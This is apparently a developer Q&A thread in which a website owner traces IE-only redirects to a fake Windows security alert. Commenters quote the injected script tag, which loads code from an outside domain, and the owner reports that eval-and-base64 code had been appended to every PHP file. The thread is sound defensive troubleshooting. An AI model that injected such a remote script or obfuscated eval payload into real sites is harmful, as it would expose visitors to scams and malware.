# Fake Windows Security Alert

Tags: security, malware

I have a website which is redirecting users to a fake windows security alert and I'm not to sure how to get rid of it. What's weird is that it's only happening in IE and that it seems to happen the first time visiting the site but then will not happen again (even after clearing cache and cookies).

This is what my site is being redirected to:
http://assets.malwarehelp.org/blog/wp-content/uploads/2009/09/04.jpg

I've looked through the source and haven't found any injected scripts. I'm not too sure where to go from here.  Any help is appreciated.

This is my site and the link which I was getting reports about: http://www.agendaprofile.com/skill-builder#16012ce4a0

Comment: Are you running scripts from external pages? They may have been comprized. Who is serving your ads?

Comment: I don't have any third party scripts (other than the jquery core from google) and I'm using adsense to service my ads.

Comment: So .. now it is all fine?

Comment: @LazyOne No, I just replicated the behavior. @Michael: What's running your site? This type of thing is a relatively common WordPress exploit, but I can't immediately find evidence that's what you're using. Some more information about your system would let us give you more specific information. To start, though, search your theme files(whatever the CMS) for any unfamiliar code. Especially do a search for the term "eval" Also, check your CMS/app for any plugins you don't recall installing.

Comment: @Su' I see nothing in Chrome and Firefox (Chrome has virtually no extensions while Firefox has NoScript/AdBlock). Which browser do you have .. and what advert do you see when it happens?

Comment: @LazyOne See question: IE only.

Comment: Somehow I missed that "IE" part in whole message. Any way -- it is **definitely** done on Server Side -- **check your PHP code**. This line gets added just before `</body>` tag: `<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>`. It is only present if Browser string = IE (I have tried one for v9, 8 & 7 -- all have that line appeared).

Comment: It's not wordpress or anything it's just custom php code. Looking at my footer file, I don't see anything just before the `</body>` tag. I just have the google analytic code.  So I guess it must be some script that's appending it to the body.

Comment: Found it! The code was added through an eval and a base 64 encode. It was added to each php file separately. Thanks for all the help!